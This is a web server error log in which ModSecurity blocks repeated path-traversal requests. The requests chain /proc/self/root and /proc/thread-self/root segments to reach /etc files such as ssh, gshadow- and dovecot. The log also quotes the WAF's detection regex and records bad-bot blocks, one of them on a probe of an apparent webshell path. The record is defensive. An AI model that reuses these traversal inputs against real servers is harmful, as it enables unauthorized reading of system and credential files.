[Thu Mar 19 05:09:01.626284 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.243.128:59962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvHF_V7PWP6ixUYl6OCAAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:04.755482 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:48440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvIBkFeYa1D6dYQnDBCwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:09.672518 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:48448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvJQbLMZ6AikZjR9UvugAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:34.279683 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:53732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvPta6ubjKNq_cu4YVFAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:35.644086 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:55716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvPxkFeYa1D6dYQnDBEgAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:37.087803 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:55732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvQQkwaGbbGflqUZCIjAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:38.440072 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:55740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvQuyqAr6etmhZHNo1vwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:40.335037 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.228.61:41234] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuvRAkwaGbbGflqUZCIkwAAANE"]
[Thu Mar 19 05:09:45.296955 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:48160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvScdf6f5d65gmYZRFwgAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:46.637208 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:48172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvSgkwaGbbGflqUZCInQAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:47.959868 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:48188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvS-yqAr6etmhZHNo1xQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:09:55.892211 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:48190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvUxkFeYa1D6dYQnDBJQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:00.202622 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:52946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvWNa6ubjKNq_cu4YVJAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:01.796458 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:46382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvWfu8EFLIOrSqIptxLgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:04.110589 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:46394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvXOyqAr6etmhZHNo1zgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:12.468633 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:46410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvYwkwaGbbGflqUZCItgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:12.969773 2026] [mime_magic:error] [pid 17653:tid 140411574073088] (70014)End of file found: [client 57.141.18.71:52378] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:10:14.974903 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:58826] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvZta6ubjKNq_cu4YVMwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:17.406555 2026] [:error] [pid 27293:tid 140411641214720] [client 74.7.243.128:58832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvaf-YZRR_7pZ7nDJfpAAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:32.552643 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:58848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuveNa6ubjKNq_cu4YVUwAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:37.057217 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:43408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvfQbLMZ6AikZjR9Uv4AAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:38.451213 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:43410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuvfhkFeYa1D6dYQnDBMQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:10:39.482924 2026] [:error] [pid 17887:tid 140411666392832] [client 204.12.208.18:52172] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/pl2ea67b/edit.php"] [unique_id "abuvfwkwaGbbGflqUZCIxwAAAMk"], referer: https://bandeirantesbombas.com.br/wp-content/pl2ea67b/edit.php
